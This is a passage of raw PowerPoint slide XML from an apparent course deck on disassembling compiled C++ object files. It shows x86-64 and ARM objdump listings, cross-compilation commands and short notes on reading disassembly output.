              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       0:       55              pushq   %rbp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       1:       48 89 e5        movq    %rsp, %rbp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       4:       89 7d fc        movl    %edi, -4(%rbp)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       7:       8b 7d fc        movl    -4(%rbp), %edi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       a:       83 c7 78        addl    $120, %edi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       d:       89 7d fc        movl    %edi, -4(%rbp)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      10:       8b 45 fc        movl    -4(%rbp), %eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      13:       5d              popq    %rbp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      14:       c3              retq</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      15:       66 2e 0f 1f 84 00 00 00 00 00   nopw    %cs:(%rax,%rax)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      1f:       90               nop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1800"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DF936F1-F166-974F-958F-370B62B84BBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="135334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79" y="0"/>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- 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1065414" y="1995057"/>
            <a:ext cx="10061171" cy="400396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__Z6calleri:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      20:       55              pushq   %rbp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      21:       48 89 e5        movq    %rsp, %rbp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      24:       48 83 ec 10     subq    $16, %rsp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      28:       89 7d fc        movl    %edi, -4(%rbp)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      2b:       8b 7d fc        movl    -4(%rbp), %edi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      2e:       e8 00 00 00 00  callq   0 &lt;__Z6calleri+0x13&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      33:       89 45 f8        movl    %eax, -8(%rbp)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      36:       8b 75 f8        movl    -8(%rbp), %esi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      39:       48 8d 3d 10 00 00 00    leaq    16(%rip), %rdi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      40:       b0 00           movb    $0, %al</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      42:       e8 00 00 00 00  callq   0 &lt;__Z6calleri+0x27&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      47:       89 45 f4        movl    %eax, -12(%rbp)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      4a:       48 83 c4 10     addq    $16, %rsp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      4e:       5d              popq    %rbp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      4f:       c3              retq</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D109EC5B-E6EC-9F4A-9D12-300DE3A86A7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3404547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81" y="0"/>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- 4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="2116666"/>
            <a:ext cx="11582400" cy="3843866"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750"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objdump output is fairly self explanatory, it consists of:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-28575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Header and section information followed by disassembled lines.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-28575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Each disassembled line consists of:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="2"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(hex) address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="2"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actual binary values at those addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="2"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corresponding instructions including op names and operands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-28575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One thing that stands out in the dump we included is that instructions in the x64 architecture are of variable length, in fact, we saw instructions in lengths varying from 1 byte to 10 bytes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800"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A7483B43-9848-B744-AF7C-D68853588145}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="91006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81" y="0"/>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- 5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1717966"/>
            <a:ext cx="11582400" cy="4979132"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-28575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let’s do the same thing for a cross compiled ARM object file (You should  have installed the cross compiling tools as described earlier).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-28575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arm-linux-gnueabi-g++ -o test1_arm.o –c test1.cc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-28575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we can objdump as before</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-28575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arm-linux-gnueabihf-objdump --disassemble-all test1_arm.o</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Output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>test1_arm.o:     file format elf32-littlearm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Remainder of output on next slide</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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For the ARM architecture manual, see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial"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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{085275ED-12CC-DE41-A9F9-9021AB89FD59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="57593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81" y="0"/>
            <a:ext cx="11838639" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Disassemble an ARM image - 6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="170481" y="1752601"/>
            <a:ext cx="6312747" cy="4979132"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Disassembly of section .text:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000000 &lt;_Z6calleei&gt;:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0:   e52db004  push {fp} ; (str fp, [sp, #-4]!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 4:   e28db000  add  fp, sp, #0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 8:   e24dd00c  sub  sp, sp, #12</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> c:   e50b0008  str  r0, [fp, #-8]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>10:   e51b3008  ldr  r3, [fp, #-8]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>14:   e2833078  add  r3, r3, #120    ; 0x78</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>18:   e50b3008  str  r3, [fp, #-8]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
